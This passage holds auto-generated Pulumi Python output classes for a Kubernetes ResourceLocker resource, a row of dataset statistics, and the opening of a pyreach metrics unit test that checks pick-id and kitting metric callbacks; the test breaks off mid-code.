:param str resource_version: Specific resourceVersion to which this reference is made, if any. More info: https://git.k8s.io/community/contributors/devel/sig-architecture/api-conventions.md#concurrency-control-and-consistency
:param str uid: UID of the referent. More info: https://kubernetes.io/docs/concepts/overview/working-with-objects/names/#uids
"""
if api_version is not None:
pulumi.set(__self__, "api_version", api_version)
if field_path is not None:
pulumi.set(__self__, "field_path", field_path)
if kind is not None:
pulumi.set(__self__, "kind", kind)
if name is not None:
pulumi.set(__self__, "name", name)
if namespace is not None:
pulumi.set(__self__, "namespace", namespace)
if resource_version is not None:
pulumi.set(__self__, "resource_version", resource_version)
if uid is not None:
pulumi.set(__self__, "uid", uid)
@property
@pulumi.getter(name="apiVersion")
def api_version(self) -> Optional[str]:
"""
API version of the referent.
"""
return pulumi.get(self, "api_version")
@property
@pulumi.getter(name="fieldPath")
def field_path(self) -> Optional[str]:
"""
If referring to a piece of an object instead of an entire object, this string should contain a valid JSON/Go field access statement, such as desiredState.manifest.containers[2]. For example, if the object reference is to a container within a pod, this would take on a value like: "spec.containers{name}" (where "name" refers to the name of the container that triggered the event) or if no container name is specified "spec.containers[2]" (container with index 2 in this pod). This syntax is chosen only to have some well-defined way of referencing a part of an object. TODO: this design is not final and this field is subject to change in the future.
"""
return pulumi.get(self, "field_path")
@property
@pulumi.getter
def kind(self) -> Optional[str]:
"""
Kind of the referent. More info: https://git.k8s.io/community/contributors/devel/sig-architecture/api-conventions.md#types-kinds
"""
return pulumi.get(self, "kind")
@property
@pulumi.getter
def name(self) -> Optional[str]:
"""
Name of the referent. More info: https://kubernetes.io/docs/concepts/overview/working-with-objects/names/#names
"""
return pulumi.get(self, "name")
@property
@pulumi.getter
def namespace(self) -> Optional[str]:
"""
Namespace of the referent. More info: https://kubernetes.io/docs/concepts/overview/working-with-objects/namespaces/
"""
return pulumi.get(self, "namespace")
@property
@pulumi.getter(name="resourceVersion")
def resource_version(self) -> Optional[str]:
"""
Specific resourceVersion to which this reference is made, if any. More info: https://git.k8s.io/community/contributors/devel/sig-architecture/api-conventions.md#concurrency-control-and-consistency
"""
return pulumi.get(self, "resource_version")
@property
@pulumi.getter
def uid(self) -> Optional[str]:
"""
UID of the referent. More info: https://kubernetes.io/docs/concepts/overview/working-with-objects/names/#uids
"""
return pulumi.get(self, "uid")
def _translate_property(self, prop):
return _tables.CAMEL_TO_SNAKE_CASE_TABLE.get(prop) or prop
@pulumi.output_type
class ResourceLockerSpecPatchesTargetObjectRef(dict):
"""
TargetObjectRef is a reference to the object to which the patch should be applied.
"""
def __init__(__self__, *,
api_version: Optional[str] = None,
field_path: Optional[str] = None,
kind: Optional[str] = None,
name: Optional[str] = None,
namespace: Optional[str] = None,
resource_version: Optional[str] = None,
uid: Optional[str] = None):
"""
TargetObjectRef is a reference to the object to which the patch should be applied.
:param str api_version: API version of the referent.
:param str field_path: If referring to a piece of an object instead of an entire object, this string should contain a valid JSON/Go field access statement, such as desiredState.manifest.containers[2]. For example, if the object reference is to a container within a pod, this would take on a value like: "spec.containers{name}" (where "name" refers to the name of the container that triggered the event) or if no container name is specified "spec.containers[2]" (container with index 2 in this pod). This syntax is chosen only to have some well-defined way of referencing a part of an object. TODO: this design is not final and this field is subject to change in the future.
:param str kind: Kind of the referent. More info: https://git.k8s.io/community/contributors/devel/sig-architecture/api-conventions.md#types-kinds
:param str name: Name of the referent. More info: https://kubernetes.io/docs/concepts/overview/working-with-objects/names/#names
:param str namespace: Namespace of the referent. More info: https://kubernetes.io/docs/concepts/overview/working-with-objects/namespaces/
:param str resource_version: Specific resourceVersion to which this reference is made, if any. More info: https://git.k8s.io/community/contributors/devel/sig-architecture/api-conventions.md#concurrency-control-and-consistency
:param str uid: UID of the referent. More info: https://kubernetes.io/docs/concepts/overview/working-with-objects/names/#uids
"""
if api_version is not None:
pulumi.set(__self__, "api_version", api_version)
if field_path is not None:
pulumi.set(__self__, "field_path", field_path)
if kind is not None:
pulumi.set(__self__, "kind", kind)
if name is not None:
pulumi.set(__self__, "name", name)
if namespace is not None:
pulumi.set(__self__, "namespace", namespace)
if resource_version is not None:
pulumi.set(__self__, "resource_version", resource_version)
if uid is not None:
pulumi.set(__self__, "uid", uid)
@property
@pulumi.getter(name="apiVersion")
def api_version(self) -> Optional[str]:
"""
API version of the referent.
"""
return pulumi.get(self, "api_version")
@property
@pulumi.getter(name="fieldPath")
def field_path(self) -> Optional[str]:
"""
If referring to a piece of an object instead of an entire object, this string should contain a valid JSON/Go field access statement, such as desiredState.manifest.containers[2]. For example, if the object reference is to a container within a pod, this would take on a value like: "spec.containers{name}" (where "name" refers to the name of the container that triggered the event) or if no container name is specified "spec.containers[2]" (container with index 2 in this pod). This syntax is chosen only to have some well-defined way of referencing a part of an object. TODO: this design is not final and this field is subject to change in the future.
"""
return pulumi.get(self, "field_path")
@property
@pulumi.getter
def kind(self) -> Optional[str]:
"""
Kind of the referent. More info: https://git.k8s.io/community/contributors/devel/sig-architecture/api-conventions.md#types-kinds
"""
return pulumi.get(self, "kind")
@property
@pulumi.getter
def name(self) -> Optional[str]:
"""
Name of the referent. More info: https://kubernetes.io/docs/concepts/overview/working-with-objects/names/#names
"""
return pulumi.get(self, "name")
@property
@pulumi.getter
def namespace(self) -> Optional[str]:
"""
Namespace of the referent. More info: https://kubernetes.io/docs/concepts/overview/working-with-objects/namespaces/
"""
return pulumi.get(self, "namespace")
@property
@pulumi.getter(name="resourceVersion")
def resource_version(self) -> Optional[str]:
"""
Specific resourceVersion to which this reference is made, if any. More info: https://git.k8s.io/community/contributors/devel/sig-architecture/api-conventions.md#concurrency-control-and-consistency
"""
return pulumi.get(self, "resource_version")
@property
@pulumi.getter
def uid(self) -> Optional[str]:
"""
UID of the referent. More info: https://kubernetes.io/docs/concepts/overview/working-with-objects/names/#uids
"""
return pulumi.get(self, "uid")
def _translate_property(self, prop):
return _tables.CAMEL_TO_SNAKE_CASE_TABLE.get(prop) or prop
@pulumi.output_type
class ResourceLockerSpecResources(dict):
"""
Resource represent a resource to be enforced
"""
def __init__(__self__, *,
object: Mapping[str, Any],
excluded_paths: Optional[Sequence[str]] = None):
"""
Resource represent a resource to be enforced
"""
pulumi.set(__self__, "object", object)
if excluded_paths is not None:
pulumi.set(__self__, "excluded_paths", excluded_paths)
@property
@pulumi.getter
def object(self) -> Mapping[str, Any]:
return pulumi.get(self, "object")
@property
@pulumi.getter(name="excludedPaths")
def excluded_paths(self) -> Optional[Sequence[str]]:
return pulumi.get(self, "excluded_paths")
def _translate_property(self, prop):
return _tables.CAMEL_TO_SNAKE_CASE_TABLE.get(prop) or prop
@pulumi.output_type
class ResourceLockerSpecServiceAccountRef(dict):
"""
ServiceAccountRef is the service account to be used to run the controllers associated with this configuration kubebuilder:default:="{Name: "default"}"
"""
def __init__(__self__, *,
name: Optional[str] = None):
"""
ServiceAccountRef is the service account to be used to run the controllers associated with this configuration kubebuilder:default:="{Name: "default"}"
:param str name: Name of the referent. More info: https://kubernetes.io/docs/concepts/overview/working-with-objects/names/#names TODO: Add other useful fields. apiVersion, kind, uid?
"""
if name is not None:
pulumi.set(__self__, "name", name)
@property
@pulumi.getter
def name(self) -> Optional[str]:
"""
Name of the referent. More info: https://kubernetes.io/docs/concepts/overview/working-with-objects/names/#names TODO: Add other useful fields. apiVersion, kind, uid?
"""
return pulumi.get(self, "name")
def _translate_property(self, prop):
return _tables.CAMEL_TO_SNAKE_CASE_TABLE.get(prop) or prop
@pulumi.output_type
class ResourceLockerStatus(dict):
"""
ResourceLockerStatus defines the observed state of ResourceLocker
"""
def __init__(__self__, *,
conditions: Optional[Sequence['outputs.ResourceLockerStatusConditions']] = None,
locked_patch_statuses: Optional[Mapping[str, Sequence['outputs.ResourceLockerStatusLockedPatchStatuses']]] = None,
locked_resource_statuses: Optional[Mapping[str, Sequence['outputs.ResourceLockerStatusLockedResourceStatuses']]] = None):
"""
ResourceLockerStatus defines the observed state of ResourceLocker
:param Sequence['ResourceLockerStatusConditionsArgs'] conditions: ReconcileStatus this is the general status of the main reconciler
:param Mapping[str, Sequence['ResourceLockerStatusLockedPatchStatusesArgs']] locked_patch_statuses: LockedResourceStatuses contains the reconcile status for each of the managed resources
:param Mapping[str, Sequence['ResourceLockerStatusLockedResourceStatusesArgs']] locked_resource_statuses: LockedResourceStatuses contains the reconcile status for each of the managed resources
"""
if conditions is not None:
pulumi.set(__self__, "conditions", conditions)
if locked_patch_statuses is not None:
pulumi.set(__self__, "locked_patch_statuses", locked_patch_statuses)
if locked_resource_statuses is not None:
pulumi.set(__self__, "locked_resource_statuses", locked_resource_statuses)
@property
@pulumi.getter
def conditions(self) -> Optional[Sequence['outputs.ResourceLockerStatusConditions']]:
"""
ReconcileStatus this is the general status of the main reconciler
"""
return pulumi.get(self, "conditions")
@property
@pulumi.getter(name="lockedPatchStatuses")
def locked_patch_statuses(self) -> Optional[Mapping[str, Sequence['outputs.ResourceLockerStatusLockedPatchStatuses']]]:
"""
LockedResourceStatuses contains the reconcile status for each of the managed resources
"""
return pulumi.get(self, "locked_patch_statuses")
@property
@pulumi.getter(name="lockedResourceStatuses")
def locked_resource_statuses(self) -> Optional[Mapping[str, Sequence['outputs.ResourceLockerStatusLockedResourceStatuses']]]:
"""
LockedResourceStatuses contains the reconcile status for each of the managed resources
"""
return pulumi.get(self, "locked_resource_statuses")
def _translate_property(self, prop):
return _tables.CAMEL_TO_SNAKE_CASE_TABLE.get(prop) or prop
@pulumi.output_type
class ResourceLockerStatusConditions(dict):
"""
Condition represents an observation of an object's state. Conditions are an extension mechanism intended to be used when the details of an observation are not a priori known or would not apply to all instances of a given Kind.
Conditions should be added to explicitly convey properties that users and components care about rather than requiring those properties to be inferred from other observations. Once defined, the meaning of a Condition can not be changed arbitrarily - it becomes part of the API, and has the same backwards- and forwards-compatibility concerns of any other part of the API.
"""
def __init__(__self__, *,
status: str,
type: str,
last_transition_time: Optional[str] = None,
message: Optional[str] = None,
reason: Optional[str] = None):
"""
Condition represents an observation of an object's state. Conditions are an extension mechanism intended to be used when the details of an observation are not a priori known or would not apply to all instances of a given Kind.
Conditions should be added to explicitly convey properties that users and components care about rather than requiring those properties to be inferred from other observations. Once defined, the meaning of a Condition can not be changed arbitrarily - it becomes part of the API, and has the same backwards- and forwards-compatibility concerns of any other part of the API.
:param str type: ConditionType is the type of the condition and is typically a CamelCased word or short phrase.
Condition types should indicate state in the "abnormal-true" polarity. For example, if the condition indicates when a policy is invalid, the "is valid" case is probably the norm, so the condition should be called "Invalid".
:param str reason: ConditionReason is intended to be a one-word, CamelCase representation of the category of cause of the current status. It is intended to be used in concise output, such as one-line kubectl get output, and in summarizing occurrences of causes.
"""
pulumi.set(__self__, "status", status)
pulumi.set(__self__, "type", type)
if last_transition_time is not None:
pulumi.set(__self__, "last_transition_time", last_transition_time)
if message is not None:
pulumi.set(__self__, "message", message)
if reason is not None:
pulumi.set(__self__, "reason", reason)
@property
@pulumi.getter
def status(self) -> str:
return pulumi.get(self, "status")
@property
@pulumi.getter
def type(self) -> str:
"""
ConditionType is the type of the condition and is typically a CamelCased word or short phrase.
Condition types should indicate state in the "abnormal-true" polarity. For example, if the condition indicates when a policy is invalid, the "is valid" case is probably the norm, so the condition should be called "Invalid".
"""
return pulumi.get(self, "type")
@property
@pulumi.getter(name="lastTransitionTime")
def last_transition_time(self) -> Optional[str]:
return pulumi.get(self, "last_transition_time")
@property
@pulumi.getter
def message(self) -> Optional[str]:
return pulumi.get(self, "message")
@property
@pulumi.getter
def reason(self) -> Optional[str]:
"""
ConditionReason is intended to be a one-word, CamelCase representation of the category of cause of the current status. It is intended to be used in concise output, such as one-line kubectl get output, and in summarizing occurrences of causes.
"""
return pulumi.get(self, "reason")
def _translate_property(self, prop):
return _tables.CAMEL_TO_SNAKE_CASE_TABLE.get(prop) or prop
@pulumi.output_type
class ResourceLockerStatusLockedPatchStatuses(dict):
"""
Condition represents an observation of an object's state. Conditions are an extension mechanism intended to be used when the details of an observation are not a priori known or would not apply to all instances of a given Kind.
Conditions should be added to explicitly convey properties that users and components care about rather than requiring those properties to be inferred from other observations. Once defined, the meaning of a Condition can not be changed arbitrarily - it becomes part of the API, and has the same backwards- and forwards-compatibility concerns of any other part of the API.
"""
def __init__(__self__, *,
status: str,
type: str,
last_transition_time: Optional[str] = None,
message: Optional[str] = None,
reason: Optional[str] = None):
"""
Condition represents an observation of an object's state. Conditions are an extension mechanism intended to be used when the details of an observation are not a priori known or would not apply to all instances of a given Kind.
Conditions should be added to explicitly convey properties that users and components care about rather than requiring those properties to be inferred from other observations. Once defined, the meaning of a Condition can not be changed arbitrarily - it becomes part of the API, and has the same backwards- and forwards-compatibility concerns of any other part of the API.
:param str type: ConditionType is the type of the condition and is typically a CamelCased word or short phrase.
Condition types should indicate state in the "abnormal-true" polarity. For example, if the condition indicates when a policy is invalid, the "is valid" case is probably the norm, so the condition should be called "Invalid".
:param str reason: ConditionReason is intended to be a one-word, CamelCase representation of the category of cause of the current status. It is intended to be used in concise output, such as one-line kubectl get output, and in summarizing occurrences of causes.
"""
pulumi.set(__self__, "status", status)
pulumi.set(__self__, "type", type)
if last_transition_time is not None:
pulumi.set(__self__, "last_transition_time", last_transition_time)
if message is not None:
pulumi.set(__self__, "message", message)
if reason is not None:
pulumi.set(__self__, "reason", reason)
@property
@pulumi.getter
def status(self) -> str:
return pulumi.get(self, "status")
@property
@pulumi.getter
def type(self) -> str:
"""
ConditionType is the type of the condition and is typically a CamelCased word or short phrase.
Condition types should indicate state in the "abnormal-true" polarity. For example, if the condition indicates when a policy is invalid, the "is valid" case is probably the norm, so the condition should be called "Invalid".
"""
return pulumi.get(self, "type")
@property
@pulumi.getter(name="lastTransitionTime")
def last_transition_time(self) -> Optional[str]:
return pulumi.get(self, "last_transition_time")
@property
@pulumi.getter
def message(self) -> Optional[str]:
return pulumi.get(self, "message")
@property
@pulumi.getter
def reason(self) -> Optional[str]:
"""
ConditionReason is intended to be a one-word, CamelCase representation of the category of cause of the current status. It is intended to be used in concise output, such as one-line kubectl get output, and in summarizing occurrences of causes.
"""
return pulumi.get(self, "reason")
def _translate_property(self, prop):
return _tables.CAMEL_TO_SNAKE_CASE_TABLE.get(prop) or prop
@pulumi.output_type
class ResourceLockerStatusLockedResourceStatuses(dict):
"""
Condition represents an observation of an object's state. Conditions are an extension mechanism intended to be used when the details of an observation are not a priori known or would not apply to all instances of a given Kind.
Conditions should be added to explicitly convey properties that users and components care about rather than requiring those properties to be inferred from other observations. Once defined, the meaning of a Condition can not be changed arbitrarily - it becomes part of the API, and has the same backwards- and forwards-compatibility concerns of any other part of the API.
"""
def __init__(__self__, *,
status: str,
type: str,
last_transition_time: Optional[str] = None,
message: Optional[str] = None,
reason: Optional[str] = None):
"""
Condition represents an observation of an object's state. Conditions are an extension mechanism intended to be used when the details of an observation are not a priori known or would not apply to all instances of a given Kind.
Conditions should be added to explicitly convey properties that users and components care about rather than requiring those properties to be inferred from other observations. Once defined, the meaning of a Condition can not be changed arbitrarily - it becomes part of the API, and has the same backwards- and forwards-compatibility concerns of any other part of the API.
:param str type: ConditionType is the type of the condition and is typically a CamelCased word or short phrase.
Condition types should indicate state in the "abnormal-true" polarity. For example, if the condition indicates when a policy is invalid, the "is valid" case is probably the norm, so the condition should be called "Invalid".
:param str reason: ConditionReason is intended to be a one-word, CamelCase representation of the category of cause of the current status. It is intended to be used in concise output, such as one-line kubectl get output, and in summarizing occurrences of causes.
"""
pulumi.set(__self__, "status", status)
pulumi.set(__self__, "type", type)
if last_transition_time is not None:
pulumi.set(__self__, "last_transition_time", last_transition_time)
if message is not None:
pulumi.set(__self__, "message", message)
if reason is not None:
pulumi.set(__self__, "reason", reason)
@property
@pulumi.getter
def status(self) -> str:
return pulumi.get(self, "status")
@property
@pulumi.getter
def type(self) -> str:
"""
ConditionType is the type of the condition and is typically a CamelCased word or short phrase.
Condition types should indicate state in the "abnormal-true" polarity. For example, if the condition indicates when a policy is invalid, the "is valid" case is probably the norm, so the condition should be called "Invalid".
"""
return pulumi.get(self, "type")
@property
@pulumi.getter(name="lastTransitionTime")
def last_transition_time(self) -> Optional[str]:
return pulumi.get(self, "last_transition_time")
@property
@pulumi.getter
def message(self) -> Optional[str]:
return pulumi.get(self, "message")
@property
@pulumi.getter
def reason(self) -> Optional[str]:
"""
ConditionReason is intended to be a one-word, CamelCase representation of the category of cause of the current status. It is intended to be used in concise output, such as one-line kubectl get output, and in summarizing occurrences of causes.
"""
return pulumi.get(self, "reason")
def _translate_property(self, prop):
return _tables.CAMEL_TO_SNAKE_CASE_TABLE.get(prop) or prop
| 58.345853
| 1,601
| 0.702465
| 4,846
| 37,283
| 5.30066
| 0.090384
| 0.012458
| 0.021762
| 0.031806
| 0.853
| 0.846888
| 0.830537
| 0.81512
| 0.812318
| 0.809203
| 0
| 0.002127
| 0.218303
| 37,283
| 638
| 1,602
| 58.437304
| 0.879255
| 0.552987
| 0
| 0.72702
| 1
| 0
| 0.137126
| 0.070832
| 0
| 0
| 0
| 0.009404
| 0
| 1
| 0.175487
| false
| 0
| 0.016713
| 0.058496
| 0.367688
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 1
| 1
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 9
|
26d04e4c4398f82fd8b7b98098ace6db9916127e
| 18,128
|
py
|
Python
|
pyreach/impl/metrics_impl_test.py
|
google-research/pyreach
|
f91753ce7a26e77e122eb02a9fdd5a1ce3ce0159
|
[
"Apache-2.0"
] | 13
|
2021-09-01T01:10:22.000Z
|
2022-03-05T10:01:52.000Z
|
pyreach/impl/metrics_impl_test.py
|
google-research/pyreach
|
f91753ce7a26e77e122eb02a9fdd5a1ce3ce0159
|
[
"Apache-2.0"
] | null | null | null |
pyreach/impl/metrics_impl_test.py
|
google-research/pyreach
|
f91753ce7a26e77e122eb02a9fdd5a1ce3ce0159
|
[
"Apache-2.0"
] | 6
|
2021-09-20T21:17:53.000Z
|
2022-03-14T18:42:48.000Z
|
# Copyright 2021 Google LLC
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""Tests for metrics implementation."""
from typing import List, Tuple, Union
import unittest
from pyreach import metrics
from pyreach.common.python import types_gen
from pyreach.impl import metrics_impl
from pyreach.impl import test_utils
from pyreach.impl import thread_util
class MetricsTest(unittest.TestCase):
def test_metrics_test(self) -> None:
test_utils.run_test_client_test([TestMetrics()], [
test_utils.TestResponderStep(
types_gen.CommandData(
ts=1,
device_type="robot",
data_type="reach-script",
pick_id="test-pick-id",
cmd="test-metric"),
(types_gen.DeviceData(
ts=1,
seq=11,
device_type="server",
data_type="metric",
metric_value=types_gen.KeyValue(
key="float-key", float_value=1.0),
labels=[
types_gen.KeyValue(
key="test-label", value="test-float-value"),
types_gen.KeyValue(key="pick_id", value="test-pick-id"),
types_gen.KeyValue(key="intent", value="pick")
],
event_params=[
types_gen.KeyValue(
key="test-event", value="test-float-value")
],
),
types_gen.DeviceData(
ts=1,
seq=12,
device_type="server",
data_type="metric",
metric_value=types_gen.KeyValue(
key="test-metric", float_value=1.0),
labels=[
types_gen.KeyValue(
key="test-label", value="test-float-value"),
types_gen.KeyValue(key="pick_id", value="test-pick-id"),
types_gen.KeyValue(key="intent", value="pick")
],
event_params=[
types_gen.KeyValue(
key="test-event", value="test-float-value")
],
),
types_gen.DeviceData(
ts=1,
seq=13,
device_type="server",
data_type="metric",
metric_value=types_gen.KeyValue(
key="test-metric", float_value=2.0),
labels=[
types_gen.KeyValue(key="test-label", value="test-kitting"),
types_gen.KeyValue(key="pick_id", value="test-pick-id"),
types_gen.KeyValue(key="intent", value="kitting")
],
event_params=[
types_gen.KeyValue(key="test-event", value="test-kitting")
],
)))
])
def test_metrics(self) -> None:
rdev, dev = metrics_impl.MetricDevice().get_wrapper()
with test_utils.TestDevice(rdev) as test_device:
test_device.set_responder(TestMetrics())
global_capturer: "thread_util.CallbackCapturer[metrics.Metric]"
global_capturer = thread_util.CallbackCapturer()
stop = dev.add_update_callback(global_capturer.callback_false,
global_capturer.finished_callback)
capturer: "thread_util.CallbackCapturer[metrics.Metric]"
capturer = thread_util.CallbackCapturer()
pick_id_0, wait = dev.start_pick(None, None, capturer.callback_false,
capturer.finished_callback)
test_device.send_cmd(
types_gen.CommandData(
ts=1,
device_type="robot",
data_type="reach-script",
pick_id=pick_id_0,
cmd="operator/success"))
def get_metric(key: str) -> metrics.Metric:
metric = dev.get_metric(key)
self.assertIsNotNone(metric)
assert metric
return metric
self._validate_metrics("operator/success", pick_id_0, wait())
self._validate_metrics("operator/success", pick_id_0, capturer.wait())
self._validate_metric_float(pick_id_0, get_metric("float-key"))
self._validate_metric_kitting("operator/success", pick_id_0,
get_metric("operator/success"))
capturer = thread_util.CallbackCapturer()
pick_id_1, wait = dev.start_pick(None, None, capturer.callback_false,
capturer.finished_callback)
test_device.send_cmd(
types_gen.CommandData(
ts=1,
device_type="robot",
data_type="reach-script",
pick_id=pick_id_1,
cmd="operator/pick_success"))
self._validate_metrics("operator/pick_success", pick_id_1, wait())
self._validate_metrics("operator/pick_success", pick_id_1,
capturer.wait())
self._validate_metric_float(pick_id_1, get_metric("float-key"))
self._validate_metric_kitting("operator/pick_success", pick_id_1,
get_metric("operator/pick_success"))
capturer = thread_util.CallbackCapturer()
pick_id_2, wait = dev.start_pick(None, None, capturer.callback_false,
capturer.finished_callback)
test_device.send_cmd(
types_gen.CommandData(
ts=1,
device_type="robot",
data_type="reach-script",
pick_id=pick_id_2,
cmd="operator/failure"))
self._validate_metrics("operator/failure", pick_id_2, wait())
self._validate_metrics("operator/failure", pick_id_2, capturer.wait())
self._validate_metric_float(pick_id_2, get_metric("float-key"))
self._validate_metric_kitting("operator/failure", pick_id_2,
get_metric("operator/failure"))
capturer = thread_util.CallbackCapturer()
pick_id_3, wait = dev.start_pick(None, None, capturer.callback_false,
capturer.finished_callback)
test_device.send_cmd(
types_gen.CommandData(
ts=1,
device_type="robot",
data_type="reach-script",
pick_id=pick_id_3,
cmd="operator/pick_failure"))
self._validate_metrics("operator/pick_failure", pick_id_3, wait())
self._validate_metrics("operator/pick_failure", pick_id_3,
capturer.wait())
self._validate_metric_float(pick_id_3, get_metric("float-key"))
self._validate_metric_kitting("operator/pick_failure", pick_id_3,
get_metric("operator/pick_failure"))
capturer = thread_util.CallbackCapturer()
_, wait = dev.start_pick(None, 0.0, capturer.callback_false,
capturer.finished_callback)
self.assertEqual(len(wait()), 0)
self.assertEqual(len(capturer.wait()), 0)
stop()
msgs = global_capturer.wait()
self.assertEqual(len(msgs), 12)
self._validate_metrics("operator/success", pick_id_0, msgs[0:3], True)
self._validate_metrics("operator/pick_success", pick_id_1, msgs[3:6],
True)
self._validate_metrics("operator/failure", pick_id_2, msgs[6:9], True)
self._validate_metrics("operator/pick_failure", pick_id_3, msgs[9:12],
True)
def test_metrics_kitting(self) -> None:
rdev, dev = metrics_impl.MetricDevice().get_wrapper()
with test_utils.TestDevice(rdev) as test_device:
test_device.set_responder(TestMetrics())
global_capturer: "thread_util.CallbackCapturer[metrics.Metric]"
global_capturer = thread_util.CallbackCapturer()
stop = dev.add_update_callback(global_capturer.callback_false,
global_capturer.finished_callback)
capturer: "thread_util.CallbackCapturer[metrics.Metric]"
capturer = thread_util.CallbackCapturer()
pick_id_0, wait = dev.start_pick("kitting", None, capturer.callback_false,
capturer.finished_callback)
test_device.send_cmd(
types_gen.CommandData(
ts=1,
device_type="robot",
data_type="reach-script",
pick_id=pick_id_0,
cmd="operator/success"))
def get_metric(key: str) -> metrics.Metric:
metric = dev.get_metric(key)
self.assertIsNotNone(metric)
assert metric
return metric
self._validate_metrics("operator/success", pick_id_0, wait(), True)
self._validate_metrics("operator/success", pick_id_0, capturer.wait(),
True)
self._validate_metric_float(pick_id_0, get_metric("float-key"))
self._validate_metric_kitting("operator/success", pick_id_0,
get_metric("operator/success"))
capturer = thread_util.CallbackCapturer()
pick_id_1, wait = dev.start_pick("kitting", None, capturer.callback_false,
capturer.finished_callback)
test_device.send_cmd(
types_gen.CommandData(
ts=1,
device_type="robot",
data_type="reach-script",
pick_id=pick_id_1,
cmd="operator/pick_success"))
self._validate_metrics("operator/pick_success", pick_id_1, wait(), True)
self._validate_metrics("operator/pick_success", pick_id_1,
capturer.wait(), True)
self._validate_metric_float(pick_id_1, get_metric("float-key"))
self._validate_metric_kitting("operator/pick_success", pick_id_1,
get_metric("operator/pick_success"))
capturer = thread_util.CallbackCapturer()
pick_id_2, wait = dev.start_pick("kitting", None, capturer.callback_false,
capturer.finished_callback)
test_device.send_cmd(
types_gen.CommandData(
ts=1,
device_type="robot",
data_type="reach-script",
pick_id=pick_id_2,
cmd="operator/failure"))
self._validate_metrics("operator/failure", pick_id_2, wait(), True)
self._validate_metrics("operator/failure", pick_id_2, capturer.wait(),
True)
self._validate_metric_float(pick_id_2, get_metric("float-key"))
self._validate_metric_kitting("operator/failure", pick_id_2,
get_metric("operator/failure"))
capturer = thread_util.CallbackCapturer()
pick_id_3, wait = dev.start_pick("kitting", None, capturer.callback_false,
capturer.finished_callback)
test_device.send_cmd(
types_gen.CommandData(
ts=1,
device_type="robot",
data_type="reach-script",
pick_id=pick_id_3,
cmd="operator/pick_failure"))
self._validate_metrics("operator/pick_failure", pick_id_3, wait(), True)
self._validate_metrics("operator/pick_failure", pick_id_3,
capturer.wait(), True)
self._validate_metric_float(pick_id_3, get_metric("float-key"))
self._validate_metric_kitting("operator/pick_failure", pick_id_3,
get_metric("operator/pick_failure"))
capturer = thread_util.CallbackCapturer()
_, wait = dev.start_pick("kitting", 0.0, capturer.callback_false,
capturer.finished_callback)
self.assertEqual(len(wait()), 0)
self.assertEqual(len(capturer.wait()), 0)
stop()
msgs = global_capturer.wait()
self.assertEqual(len(msgs), 12)
self._validate_metrics("operator/success", pick_id_0, msgs[0:3], True)
self._validate_metrics("operator/pick_success", pick_id_1, msgs[3:6],
True)
self._validate_metrics("operator/failure", pick_id_2, msgs[6:9], True)
self._validate_metrics("operator/pick_failure", pick_id_3, msgs[9:12],
True)
def _validate_metrics(self,
exit_key: str,
pick_id: str,
metrics_msgs: Union[List[metrics.Metric],
Tuple[metrics.Metric, ...]],
kitting: bool = False) -> None:
self.assertEqual(len(metrics_msgs), 3 if kitting else 2)
self._validate_metric_float(pick_id, metrics_msgs[0])
self.assertEqual(metrics_msgs[1].key, exit_key)
self.assertEqual(metrics_msgs[1].float_value, 1.0)
self.assertEqual(metrics_msgs[1].sequence, 12)
self.assertEqual(len(metrics_msgs[1].labels), 3)
self.assertEqual(metrics_msgs[1].labels[0][0], "test-label")
self.assertEqual(metrics_msgs[1].labels[0][1], "test-float-value")
self.assertEqual(metrics_msgs[1].labels[1][0], "pick_id")
self.assertEqual(metrics_msgs[1].labels[1][1], pick_id)
self.assertEqual(metrics_msgs[0].labels[2][0], "intent")
self.assertEqual(metrics_msgs[0].labels[2][1], "pick")
self.assertEqual(len(metrics_msgs[1].event_params), 1)
self.assertEqual(metrics_msgs[1].event_params[0][0], "test-event")
self.assertEqual(metrics_msgs[1].event_params[0][1], "test-float-value")
if kitting:
self._validate_metric_kitting(exit_key, pick_id, metrics_msgs[2])
def _validate_metric_float(self, pick_id: str,
metric: metrics.Metric) -> None:
self.assertEqual(metric.key, "float-key")
self.assertEqual(metric.float_value, 1.0)
self.assertEqual(metric.sequence, 11)
self.assertEqual(len(metric.labels), 3)
self.assertEqual(metric.labels[0][0], "test-label")
self.assertEqual(metric.labels[0][1], "test-float-value")
self.assertEqual(metric.labels[1][0], "pick_id")
self.assertEqual(metric.labels[1][1], pick_id)
self.assertEqual(metric.labels[2][0], "intent")
self.assertEqual(metric.labels[2][1], "pick")
self.assertEqual(len(metric.event_params), 1)
self.assertEqual(metric.event_params[0][0], "test-event")
self.assertEqual(metric.event_params[0][1], "test-float-value")
def _validate_metric_kitting(self, exit_key: str, pick_id: str,
metric: metrics.Metric) -> None:
self.assertEqual(metric.key, exit_key)
self.assertEqual(metric.float_value, 2.0)
self.assertEqual(metric.sequence, 13)
self.assertEqual(len(metric.labels), 3)
self.assertEqual(metric.labels[0][0], "test-label")
self.assertEqual(metric.labels[0][1], "test-kitting")
self.assertEqual(metric.labels[1][0], "pick_id")
self.assertEqual(metric.labels[1][1], pick_id)
self.assertEqual(metric.labels[2][0], "intent")
self.assertEqual(metric.labels[2][1], "kitting")
self.assertEqual(len(metric.event_params), 1)
self.assertEqual(metric.event_params[0][0], "test-event")
self.assertEqual(metric.event_params[0][1], "test-kitting")
class TestMetrics(test_utils.TestResponder):
"""Represents a Metrics for use in a test suite."""
def step(self, cmd: types_gen.CommandData) -> List[types_gen.DeviceData]:
"""Test step, generates a response for testing framework data."""
if cmd.device_type == "robot" and not cmd.device_name and cmd.data_type == "reach-script":
return [
types_gen.DeviceData(
ts=cmd.ts,
seq=11,
device_type="server",
data_type="metric",
metric_value=types_gen.KeyValue(key="float-key", float_value=1.0),
labels=[
types_gen.KeyValue(
key="test-label", value="test-float-value"),
types_gen.KeyValue(key="pick_id", value=cmd.pick_id),
types_gen.KeyValue(key="intent", value="pick")
],
event_params=[
types_gen.KeyValue(
key="test-event", value="test-float-value")
],
),
types_gen.DeviceData(
